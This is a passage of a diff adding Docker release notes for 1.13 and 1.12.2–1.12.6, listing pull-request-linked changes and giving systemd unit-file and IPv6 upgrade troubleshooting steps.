A warning is presented instead of an error and failed build [#27412](https://github.com/docker/docker/pull/27412) +- Fix builder cache issue on Windows [#27805](https://github.com/docker/docker/pull/27805) ++ Allow `USER` in builder on Windows [#28415](https://github.com/docker/docker/pull/28415) ++ Handle env case-insensitive on Windows [#28725](https://github.com/docker/docker/pull/28725) + +### Contrib + ++ Add support for building docker debs for Ubuntu 16.04 Xenial on PPC64LE [#23438](https://github.com/docker/docker/pull/23438) ++ Add support for building docker debs for Ubuntu 16.04 Xenial on s390x [#26104](https://github.com/docker/docker/pull/26104) ++ Add support for building docker debs for Ubuntu 16.10 Yakkety Yak on PPC64LE [#28046](https://github.com/docker/docker/pull/28046) +- Add RPM builder for VMWare Photon OS [#24116](https://github.com/docker/docker/pull/24116) ++ Add shell completions to tgz [#27735](https://github.com/docker/docker/pull/27735) +* Update the install script to allow using the mirror in China [#27005](https://github.com/docker/docker/pull/27005) ++ Add DEB builder for Ubuntu 16.10 Yakkety Yak [#27993](https://github.com/docker/docker/pull/27993) ++ Add RPM builder for Fedora 25 [#28222](https://github.com/docker/docker/pull/28222) ++ Add `make deb` support for aarch64 [#27625](https://github.com/docker/docker/pull/27625) + +### Distribution + +* Update notary dependency to 0.4.2 (full changelogs [here](https://github.com/docker/notary/releases/tag/v0.4.2)) [#27074](https://github.com/docker/docker/pull/27074) + - Support for compilation on windows [docker/notary#970](https://github.com/docker/notary/pull/970) + - Improved error messages for client authentication errors [docker/notary#972](https://github.com/docker/notary/pull/972) + - Support for finding keys that are anywhere in the `~/.docker/trust/private` directory, not just under `~/.docker/trust/private/root_keys` or `~/.docker/trust/private/tuf_keys` 
[docker/notary#981](https://github.com/docker/notary/pull/981) + - Previously, on any error updating, the client would fall back on the cache. Now we only do so if there is a network error or if the server is unavailable or missing the TUF data. Invalid TUF data will cause the update to fail - for example if there was an invalid root rotation. [docker/notary#982](https://github.com/docker/notary/pull/982) + - Improve root validation and yubikey debug logging [docker/notary#858](https://github.com/docker/notary/pull/858) [docker/notary#891](https://github.com/docker/notary/pull/891) + - Warn if certificates for root or delegations are near expiry [docker/notary#802](https://github.com/docker/notary/pull/802) + - Warn if role metadata is near expiry [docker/notary#786](https://github.com/docker/notary/pull/786) + - Fix passphrase retrieval attempt counting and terminal detection [docker/notary#906](https://github.com/docker/notary/pull/906) +- Avoid unnecessary blob uploads when different users push same layers to authenticated registry [#26564](https://github.com/docker/docker/pull/26564) +* Allow external storage for registry credentials [#26354](https://github.com/docker/docker/pull/26354) + +### Logging + +* Standardize the default logging tag value in all logging drivers [#22911](https://github.com/docker/docker/pull/22911) +- Improve performance and memory use when logging of long log lines [#22982](https://github.com/docker/docker/pull/22982) ++ Enable syslog driver for windows [#25736](https://github.com/docker/docker/pull/25736) ++ Add Logentries Driver [#27471](https://github.com/docker/docker/pull/27471) ++ Update of AWS log driver to support tags [#27707](https://github.com/docker/docker/pull/27707) ++ Unix socket support for fluentd [#26088](https://github.com/docker/docker/pull/26088) +* Enable fluentd logging driver on Windows [#28189](https://github.com/docker/docker/pull/28189) +- Sanitize docker labels when used as journald field names 
[#23725](https://github.com/docker/docker/pull/23725) +- Fix an issue where `docker logs --tail` returned less lines than expected [#28203](https://github.com/docker/docker/pull/28203) +- Splunk Logging Driver: performance and reliability improvements [#26207](https://github.com/docker/docker/pull/26207) +- Splunk Logging Driver: configurable formats and skip for verifying connection [#25786](https://github.com/docker/docker/pull/25786) + +### Networking + ++ Add `--attachable` network support to enable `docker run` to work in swarm-mode overlay network [#25962](https://github.com/docker/docker/pull/25962) ++ Add support for host port PublishMode in services using the `--publish` option in `docker service create` [#27917](https://github.com/docker/docker/pull/27917) and [#28943](https://github.com/docker/docker/pull/28943) ++ Add support for Windows server 2016 overlay network driver (requires upcoming ws2016 update) [#28182](https://github.com/docker/docker/pull/28182) +* Change the default `FORWARD` policy to `DROP` [#28257](https://github.com/docker/docker/pull/28257) ++ Add support for specifying static IP addresses for predefined network on windows [#22208](https://github.com/docker/docker/pull/22208) +- Fix `--publish` flag on `docker run` not working with IPv6 addresses [#27860](https://github.com/docker/docker/pull/27860) +- Fix inspect network show gateway with mask [#25564](https://github.com/docker/docker/pull/25564) +- Fix an issue where multiple addresses in a bridge may cause `--fixed-cidr` to not have the correct addresses [#26659](https://github.com/docker/docker/pull/26659) ++ Add creation timestamp to `docker network inspect` [#26130](https://github.com/docker/docker/pull/26130) +- Show peer nodes in `docker network inspect` for swarm overlay networks [#28078](https://github.com/docker/docker/pull/28078) +- Enable ping for service VIP address [#28019](https://github.com/docker/docker/pull/28019) + +### Plugins + +- Move plugins out of experimental 
[#28226](https://github.com/docker/docker/pull/28226) +- Add `--force` on `docker plugin remove` [#25096](https://github.com/docker/docker/pull/25096) +* Add support for dynamically reloading authorization plugins [#22770](https://github.com/docker/docker/pull/22770) ++ Add description in `docker plugin ls` [#25556](https://github.com/docker/docker/pull/25556) ++ Add `-f`/`--format` to `docker plugin inspect` [#25990](https://github.com/docker/docker/pull/25990) ++ Add `docker plugin create` command [#28164](https://github.com/docker/docker/pull/28164) +* Send request's TLS peer certificates to authorization plugins [#27383](https://github.com/docker/docker/pull/27383) +* Support for global-scoped network and ipam plugins in swarm-mode [#27287](https://github.com/docker/docker/pull/27287) +* Split `docker plugin install` into two API call `/privileges` and `/pull` [#28963](https://github.com/docker/docker/pull/28963) + +### Remote API (v1.25) & Client + ++ Support `docker stack deploy` from a Compose file [#27998](https://github.com/docker/docker/pull/27998) ++ (experimental) Implement checkpoint and restore [#22049](https://github.com/docker/docker/pull/22049) ++ Add `--format` flag to `docker info` [#23808](https://github.com/docker/docker/pull/23808) +* Remove `--name` from `docker volume create` [#23830](https://github.com/docker/docker/pull/23830) ++ Add `docker stack ls` [#23886](https://github.com/docker/docker/pull/23886) ++ Add a new `is-task` ps filter [#24411](https://github.com/docker/docker/pull/24411) ++ Add `--env-file` flag to `docker service create` [#24844](https://github.com/docker/docker/pull/24844) ++ Add `--format` on `docker stats` [#24987](https://github.com/docker/docker/pull/24987) ++ Make `docker node ps` default to `self` in swarm node [#25214](https://github.com/docker/docker/pull/25214) ++ Add `--group` in `docker service create` [#25317](https://github.com/docker/docker/pull/25317) ++ Add `--no-trunc` to service/node/stack ps output 
[#25337](https://github.com/docker/docker/pull/25337) ++ Add Logs to `ContainerAttachOptions` so go clients can request to retrieve container logs as part of the attach process [#26718](https://github.com/docker/docker/pull/26718) ++ Allow client to talk to an older server [#27745](https://github.com/docker/docker/pull/27745) +* Inform user client-side that a container removal is in progress [#26074](https://github.com/docker/docker/pull/26074) ++ Add `Isolation` to the /info endpoint [#26255](https://github.com/docker/docker/pull/26255) ++ Add `userns` to the /info endpoint [#27840](https://github.com/docker/docker/pull/27840) +- Do not allow more than one mode be requested at once in the services endpoint [#26643](https://github.com/docker/docker/pull/26643) ++ Add capability to /containers/create API to specify mounts in a more granular and safer way [#22373](https://github.com/docker/docker/pull/22373) ++ Add `--format` flag to `network ls` and `volume ls` [#23475](https://github.com/docker/docker/pull/23475) +* Allow the top-level `docker inspect` command to inspect any kind of resource [#23614](https://github.com/docker/docker/pull/23614) ++ Add --cpus flag to control cpu resources for `docker run` and `docker create`, and add `NanoCPUs` to `HostConfig` [#27958](https://github.com/docker/docker/pull/27958) +- Allow unsetting the `--entrypoint` in `docker run` or `docker create` [#23718](https://github.com/docker/docker/pull/23718) +* Restructure CLI commands by adding `docker image` and `docker container` commands for more consistency [#26025](https://github.com/docker/docker/pull/26025) +- Remove `COMMAND` column from `service ls` output [#28029](https://github.com/docker/docker/pull/28029) ++ Add `--format` to `docker events` [#26268](https://github.com/docker/docker/pull/26268) +* Allow specifying multiple nodes on `docker node ps` [#26299](https://github.com/docker/docker/pull/26299) +* Restrict fractional digits to 2 decimals in `docker images` output 
[#26303](https://github.com/docker/docker/pull/26303) ++ Add `--dns-option` to `docker run` [#28186](https://github.com/docker/docker/pull/28186) ++ Add Image ID to container commit event [#28128](https://github.com/docker/docker/pull/28128) ++ Add external binaries version to docker info [#27955](https://github.com/docker/docker/pull/27955) ++ Add information for `Manager Addresses` in the output of `docker info` [#28042](https://github.com/docker/docker/pull/28042) ++ Add a new reference filter for `docker images` [#27872](https://github.com/docker/docker/pull/27872) + +### Runtime + ++ Add `--experimental` daemon flag to enable experimental features, instead of shipping them in a separate build [#27223](https://github.com/docker/docker/pull/27223) ++ Add a `--shutdown-timeout` daemon flag to specify the default timeout (in seconds) to stop containers gracefully before daemon exit [#23036](https://github.com/docker/docker/pull/23036) ++ Add `--stop-timeout` to specify the timeout value (in seconds) for individual containers to stop [#22566](https://github.com/docker/docker/pull/22566) ++ Add a new daemon flag `--userland-proxy-path` to allow configuring the userland proxy instead of using the hardcoded `docker-proxy` from `$PATH` [#26882](https://github.com/docker/docker/pull/26882) ++ Add boolean flag `--init` on `dockerd` and on `docker run` to use [tini](https://github.com/krallin/tini) a zombie-reaping init process as PID 1 [#26061](https://github.com/docker/docker/pull/26061) [#28037](https://github.com/docker/docker/pull/28037) ++ Add a new daemon flag `--init-path` to allow configuring the path to the `docker-init` binary [#26941](https://github.com/docker/docker/pull/26941) ++ Add support for live reloading insecure registry in configuration [#22337](https://github.com/docker/docker/pull/22337) ++ Add support for storage-opt size on Windows daemons [#23391](https://github.com/docker/docker/pull/23391) +* Improve reliability of `docker run --rm` by moving 
it from the client to the daemon [#20848](https://github.com/docker/docker/pull/20848) ++ Add support for `--cpu-rt-period` and `--cpu-rt-runtime` flags, allowing containers to run real-time threads when `CONFIG_RT_GROUP_SCHED` is enabled in the kernel [#23430](https://github.com/docker/docker/pull/23430) +* Allow parallel stop, pause, unpause [#24761](https://github.com/docker/docker/pull/24761) / [#26778](https://github.com/docker/docker/pull/26778) +* Implement XFS quota for overlay2 [#24771](https://github.com/docker/docker/pull/24771) +- Fix partial/full filter issue in `service tasks --filter` [#24850](https://github.com/docker/docker/pull/24850) +- Allow engine to run inside a user namespace [#25672](https://github.com/docker/docker/pull/25672) +- Fix a race condition between device deferred removal and resume device, when using the devicemapper graphdriver [#23497](https://github.com/docker/docker/pull/23497) +- Add `docker stats` support in Windows [#25737](https://github.com/docker/docker/pull/25737) +- Allow using `--pid=host` and `--net=host` when `--userns=host` [#25771](https://github.com/docker/docker/pull/25771) ++ (experimental) Add metrics (Prometheus) output for basic `container`, `image`, and `daemon` operations [#25820](https://github.com/docker/docker/pull/25820) +- Fix issue in `docker stats` with `NetworkDisabled=true` [#25905](https://github.com/docker/docker/pull/25905) ++ Add `docker top` support in Windows [#25891](https://github.com/docker/docker/pull/25891) ++ Record pid of exec'd process [#27470](https://github.com/docker/docker/pull/27470) ++ Add support for looking up user/groups via `getent` [#27599](https://github.com/docker/docker/pull/27599) ++ Add new `docker system` command with `df` and `prune` subcommands for system resource management, as well as `docker {container,image,volume,network} prune` subcommands [#26108](https://github.com/docker/docker/pull/26108) [#27525](https://github.com/docker/docker/pull/27525) / 
[#27525](https://github.com/docker/docker/pull/27525) +- Fix an issue where containers could not be stopped or killed by setting xfs max_retries to 0 upon ENOSPC with devicemapper [#26212](https://github.com/docker/docker/pull/26212) +- Fix `docker cp` failing to copy to a container's volume dir on CentOS with devicemapper [#28047](https://github.com/docker/docker/pull/28047) +* Promote overlay(2) graphdriver [#27932](https://github.com/docker/docker/pull/27932) ++ Add `--seccomp-profile` daemon flag to specify a path to a seccomp profile that overrides the default [#26276](https://github.com/docker/docker/pull/26276) +- Fix ulimits in `docker inspect` when `--default-ulimit` is set on daemon [#26405](https://github.com/docker/docker/pull/26405) +- Add workaround for overlay issues during build in older kernels [#28138](https://github.com/docker/docker/pull/28138) ++ Add `TERM` environment variable on `docker exec -t` [#26461](https://github.com/docker/docker/pull/26461) +* Honor a container’s `--stop-signal` setting upon `docker kill` [#26464](https://github.com/docker/docker/pull/26464) + +### Swarm Mode + ++ Add secret management [#27794](https://github.com/docker/docker/pull/27794) ++ Add support for templating service options (hostname, mounts, and environment variables) [#28025](https://github.com/docker/docker/pull/28025) +* Display the endpoint mode in the output of `docker service inspect --pretty` [#26906](https://github.com/docker/docker/pull/26906) +* Make `docker service ps` output more bearable by shortening service IDs in task names [#28088](https://github.com/docker/docker/pull/28088) +* Make `docker node ps` default to the current node [#25214](https://github.com/docker/docker/pull/25214) ++ Add `--dns`, -`-dns-opt`, and `--dns-search` to service create. 
[#27567](https://github.com/docker/docker/pull/27567) ++ Add `--force` to `docker service update` [#27596](https://github.com/docker/docker/pull/27596) ++ Add `--health-*` and `--no-healthcheck` flags to `docker service create` and `docker service update` [#27369](https://github.com/docker/docker/pull/27369) ++ Add `-q` to `docker service ps` [#27654](https://github.com/docker/docker/pull/27654) +* Display number of global services in `docker service ls` [#27710](https://github.com/docker/docker/pull/27710) +- Remove `--name` flag from `docker service update`. This flag is only functional on `docker service create`, so was removed from the `update` command [#26988](https://github.com/docker/docker/pull/26988) +- Fix worker nodes failing to recover because of transient networking issues [#26646](https://github.com/docker/docker/issues/26646) +* Add support for health aware load balancing and DNS records [#27279](https://github.com/docker/docker/pull/27279) ++ Add `--hostname` to `docker service create` [#27857](https://github.com/docker/docker/pull/27857) ++ Add `--host` to `docker service create`, and `--host-add`, `--host-rm` to `docker service update` [#28031](https://github.com/docker/docker/pull/28031) ++ Add `--tty` flag to `docker service create`/`update` [#28076](https://github.com/docker/docker/pull/28076) +* Autodetect, store, and expose node IP address as seen by the manager [#27910](https://github.com/docker/docker/pull/27910) +* Encryption at rest of manager keys and raft data [#27967](https://github.com/docker/docker/pull/27967) ++ Add `--update-max-failure-ratio`, `--update-monitor` and `--rollback` flags to `docker service update` [#26421](https://github.com/docker/docker/pull/26421) +- Fix an issue with address autodiscovery on `docker swarm init` running inside a container [#26457](https://github.com/docker/docker/pull/26457) ++ (experimental) Add `docker service logs` command to view logs for a service 
[#28089](https://github.com/docker/docker/pull/28089) ++ Pin images by digest for `docker service create` and `update` [#28173](https://github.com/docker/docker/pull/28173) +* Add short (`-f`) flag for `docker node rm --force` and `docker swarm leave --force` [#28196](https://github.com/docker/docker/pull/28196) ++ Add options to customize Raft snapshots (`--max-snapshots`, `--snapshot-interval`) [#27997](https://github.com/docker/docker/pull/27997) +- Don't repull image if pinned by digest [#28265](https://github.com/docker/docker/pull/28265) ++ Swarm-mode support for Windows [#27838](https://github.com/docker/docker/pull/27838) ++ Allow hostname to be updated on service [#28771](https://github.com/docker/docker/pull/28771) ++ Support v2 plugins [#29433](https://github.com/docker/docker/pull/29433) ++ Add content trust for services [#29469](https://github.com/docker/docker/pull/29469) + +### Volume + ++ Add support for labels on volumes [#21270](https://github.com/docker/docker/pull/21270) ++ Add support for filtering volumes by label [#25628](https://github.com/docker/docker/pull/25628) +* Add a `--force` flag in `docker volume rm` to forcefully purge the data of the volume that has already been deleted [#23436](https://github.com/docker/docker/pull/23436) +* Enhance `docker volume inspect` to show all options used when creating the volume [#26671](https://github.com/docker/docker/pull/26671) +* Add support for local NFS volumes to resolve hostnames [#27329](https://github.com/docker/docker/pull/27329) + +### Security + +- Fix selinux labeling of volumes shared in a container [#23024](https://github.com/docker/docker/pull/23024) +- Prohibit `/sys/firmware/**` from being accessed with apparmor [#26618](https://github.com/docker/docker/pull/26618) + +### DEPRECATION + +- Marked the `docker daemon` command as deprecated. 
The daemon is moved to a separate binary (`dockerd`), and should be used instead [#26834](https://github.com/docker/docker/pull/26834) +- Deprecate unversioned API endpoints [#28208](https://github.com/docker/docker/pull/28208) +- Remove Ubuntu 15.10 (Wily Werewolf) as supported platform. Ubuntu 15.10 is EOL, and no longer receives updates [#27042](https://github.com/docker/docker/pull/27042) +- Remove Fedora 22 as supported platform. Fedora 22 is EOL, and no longer receives updates [#27432](https://github.com/docker/docker/pull/27432) +- Remove Fedora 23 as supported platform. Fedora 23 is EOL, and no longer receives updates [#29455](https://github.com/docker/docker/pull/29455) +- Deprecate the `repo:shortid` syntax on `docker pull` [#27207](https://github.com/docker/docker/pull/27207) +- Deprecate backing filesystem without `d_type` for overlay and overlay2 storage drivers [#27433](https://github.com/docker/docker/pull/27433) +- Deprecate `MAINTAINER` in Dockerfile [#25466](https://github.com/docker/docker/pull/25466) +- Deprecate `filter` param for endpoint `/images/json` [#27872](https://github.com/docker/docker/pull/27872) +- Deprecate setting duplicate engine labels [#24533](https://github.com/docker/docker/pull/24533) +- Deprecate "top-level" network information in `NetworkSettings` [#28437](https://github.com/docker/docker/pull/28437) + +## 1.12.6 (2017-01-10) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). 
When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + +**NOTE**: Docker 1.12.5 will correctly validate that either an IPv6 subnet is provided or +that the IPAM driver can provide one when you specify the `--ipv6` option. 
+ +If you are currently using the `--ipv6` option _without_ specifying the +`--fixed-cidr-v6` option, the Docker daemon will refuse to start with the +following message: + +```none +Error starting daemon: Error initializing network controller: Error creating + default "bridge" network: failed to parse pool request + for address space "LocalDefault" pool " subpool ": + could not find an available, non-overlapping IPv6 address + pool among the defaults to assign to the network +``` + +To resolve this error, either remove the `--ipv6` flag (to preserve the same +behavior as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the +value of the `--fixed-cidr-v6` flag. + +In a similar way, if you specify the `--ipv6` flag when creating a network +with the default IPAM driver, without providing an IPv6 `--subnet`, network +creation will fail with the following message: + +```none +Error response from daemon: failed to parse pool request for address space + "LocalDefault" pool "" subpool "": could not find an + available, non-overlapping IPv6 address pool among + the defaults to assign to the network +``` + +To resolve this, either remove the `--ipv6` flag (to preserve the same behavior +as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the value of the +`--subnet` flag. + +The network creation will instead succeed if you use an external IPAM driver +which supports automatic allocation of IPv6 subnets. + +### Runtime + +- Fix runC privilege escalation (CVE-2016-9962) + +## 1.12.5 (2016-12-15) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). 
When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + +**NOTE**: Docker 1.12.5 will correctly validate that either an IPv6 subnet is provided or +that the IPAM driver can provide one when you specify the `--ipv6` option. 
+ +If you are currently using the `--ipv6` option _without_ specifying the +`--fixed-cidr-v6` option, the Docker daemon will refuse to start with the +following message: + +```none +Error starting daemon: Error initializing network controller: Error creating + default "bridge" network: failed to parse pool request + for address space "LocalDefault" pool " subpool ": + could not find an available, non-overlapping IPv6 address + pool among the defaults to assign to the network +``` + +To resolve this error, either remove the `--ipv6` flag (to preserve the same +behavior as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the +value of the `--fixed-cidr-v6` flag. + +In a similar way, if you specify the `--ipv6` flag when creating a network +with the default IPAM driver, without providing an IPv6 `--subnet`, network +creation will fail with the following message: + +```none +Error response from daemon: failed to parse pool request for address space + "LocalDefault" pool "" subpool "": could not find an + available, non-overlapping IPv6 address pool among + the defaults to assign to the network +``` + +To resolve this, either remove the `--ipv6` flag (to preserve the same behavior +as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the value of the +`--subnet` flag. + +The network creation will instead succeed if you use an external IPAM driver +which supports automatic allocation of IPv6 subnets. 
+ +### Runtime + +- Fix race on sending stdin close event [#29424](https://github.com/docker/docker/pull/29424) + +### Networking + +- Fix panic in docker network ls when a network was created with `--ipv6` and no ipv6 `--subnet` in older docker versions [#29416](https://github.com/docker/docker/pull/29416) + +### Contrib + +- Fix compilation on Darwin [#29370](https://github.com/docker/docker/pull/29370) + +## 1.12.4 (2016-12-12) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. 
+ + +### Runtime + +- Fix issue where volume metadata was not removed [#29083](https://github.com/docker/docker/pull/29083) +- Asynchronously close streams to prevent holding container lock [#29050](https://github.com/docker/docker/pull/29050) +- Fix selinux labels for newly created container volumes [#29050](https://github.com/docker/docker/pull/29050) +- Remove hostname validation [#28990](https://github.com/docker/docker/pull/28990) +- Fix deadlocks caused by IO races [#29095](https://github.com/docker/docker/pull/29095) [#29141](https://github.com/docker/docker/pull/29141) +- Return an empty stats if the container is restarting [#29150](https://github.com/docker/docker/pull/29150) +- Fix volume store locking [#29151](https://github.com/docker/docker/pull/29151) +- Ensure consistent status code in API [#29150](https://github.com/docker/docker/pull/29150) +- Fix incorrect opaque directory permission in overlay2 [#29093](https://github.com/docker/docker/pull/29093) +- Detect plugin content and error out on `docker pull` [#29297](https://github.com/docker/docker/pull/29297) + +### Swarm Mode + +* Update Swarmkit [#29047](https://github.com/docker/docker/pull/29047) + - orchestrator/global: Fix deadlock on updates [docker/swarmkit#1760](https://github.com/docker/swarmkit/pull/1760) + - on leader switchover preserve the vxlan id for existing networks [docker/swarmkit#1773](https://github.com/docker/swarmkit/pull/1773) +- Refuse swarm spec not named "default" [#29152](https://github.com/docker/docker/pull/29152) + +### Networking + +* Update libnetwork [#29004](https://github.com/docker/docker/pull/29004) [#29146](https://github.com/docker/docker/pull/29146) + - Fix panic in embedded DNS [docker/libnetwork#1561](https://github.com/docker/libnetwork/pull/1561) + - Fix unmarshalling panic when passing --link-local-ip on global scope network [docker/libnetwork#1564](https://github.com/docker/libnetwork/pull/1564) + - Fix panic when network plugin returns nil StaticRoutes 
[docker/libnetwork#1563](https://github.com/docker/libnetwork/pull/1563) + - Fix panic in osl.(*networkNamespace).DeleteNeighbor [docker/libnetwork#1555](https://github.com/docker/libnetwork/pull/1555) + - Fix panic in swarm networking concurrent map read/write [docker/libnetwork#1570](https://github.com/docker/libnetwork/pull/1570) + * Allow encrypted networks when running docker inside a container [docker/libnetwork#1502](https://github.com/docker/libnetwork/pull/1502) + - Do not block autoallocation of IPv6 pool [docker/libnetwork#1538](https://github.com/docker/libnetwork/pull/1538) + - Set timeout for netlink calls [docker/libnetwork#1557](https://github.com/docker/libnetwork/pull/1557) + - Increase networking local store timeout to one minute [docker/libkv#140](https://github.com/docker/libkv/pull/140) + - Fix a panic in libnetwork.(*sandbox).execFunc [docker/libnetwork#1556](https://github.com/docker/libnetwork/pull/1556) + - Honor icc=false for internal networks [docker/libnetwork#1525](https://github.com/docker/libnetwork/pull/1525) + +### Logging + +* Update syslog log driver [#29150](https://github.com/docker/docker/pull/29150) + +### Contrib + +- Run "dnf upgrade" before installing in fedora [#29150](https://github.com/docker/docker/pull/29150) +- Add build-date back to RPM packages [#29150](https://github.com/docker/docker/pull/29150) +- deb package filename changed to include distro to distinguish between distro code names [#27829](https://github.com/docker/docker/pull/27829) + +## 1.12.3 (2016-10-26) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). 
When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. 
+ + +### Runtime + +- Fix ambient capability usage in containers (CVE-2016-8867) [#27610](https://github.com/docker/docker/pull/27610) +- Prevent a deadlock in libcontainerd for Windows [#27136](https://github.com/docker/docker/pull/27136) +- Fix error reporting in CopyFileWithTar [#27075](https://github.com/docker/docker/pull/27075) +* Reset health status to starting when a container is restarted [#27387](https://github.com/docker/docker/pull/27387) +* Properly handle shared mount propagation in storage directory [#27609](https://github.com/docker/docker/pull/27609) +- Fix docker exec [#27610](https://github.com/docker/docker/pull/27610) +- Fix backward compatibility with containerd’s events log [#27693](https://github.com/docker/docker/pull/27693) + +### Swarm Mode + +- Fix conversion of restart-policy [#27062](https://github.com/docker/docker/pull/27062) +* Update Swarmkit [#27554](https://github.com/docker/docker/pull/27554) + * Avoid restarting a task that has already been restarted [docker/swarmkit#1305](https://github.com/docker/swarmkit/pull/1305) + * Allow duplicate published ports when they use different protocols [docker/swarmkit#1632](https://github.com/docker/swarmkit/pull/1632) + * Allow multiple randomly assigned published ports on service [docker/swarmkit#1657](https://github.com/docker/swarmkit/pull/1657) + - Fix panic when allocations happen at init time [docker/swarmkit#1651](https://github.com/docker/swarmkit/pull/1651) + +### Networking + +* Update libnetwork [#27559](https://github.com/docker/docker/pull/27559) + - Fix race in serializing sandbox to string [docker/libnetwork#1495](https://github.com/docker/libnetwork/pull/1495) + - Fix race during deletion [docker/libnetwork#1503](https://github.com/docker/libnetwork/pull/1503) + * Reset endpoint port info on connectivity revoke in bridge driver [docker/libnetwork#1504](https://github.com/docker/libnetwork/pull/1504) + - Fix a deadlock in networking code 
[docker/libnetwork#1507](https://github.com/docker/libnetwork/pull/1507) + - Fix a race in load balancer state [docker/libnetwork#1512](https://github.com/docker/libnetwork/pull/1512) + +### Logging + +* Update fluent-logger-golang to v1.2.1 [#27474](https://github.com/docker/docker/pull/27474) + +### Contrib + +* Update buildtags for armhf ubuntu-trusty [#27327](https://github.com/docker/docker/pull/27327) +* Add AppArmor to runc buildtags for armhf [#27421](https://github.com/docker/docker/pull/27421) + +## 1.12.2 (2016-10-11) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. 
+
+
+### Runtime
+
+- Fix a panic due to a race condition filtering `docker ps` [#26049](https://github.com/docker/docker/pull/26049)
+* Implement retry logic to prevent "Unable to remove filesystem" errors when using the aufs storage driver [#26536](https://github.com/docker/docker/pull/26536)
+* Prevent devicemapper from removing device symlinks if `dm.use_deferred_removal` is enabled [#24740](https://github.com/docker/docker/pull/24740)
+- Fix an issue where the CLI did not return correct exit codes if a command was run with invalid options [#26777](https://github.com/docker/docker/pull/26777)
+- Fix a panic due to a bug in stdout / stderr processing in health checks [#26507](https://github.com/docker/docker/pull/26507)
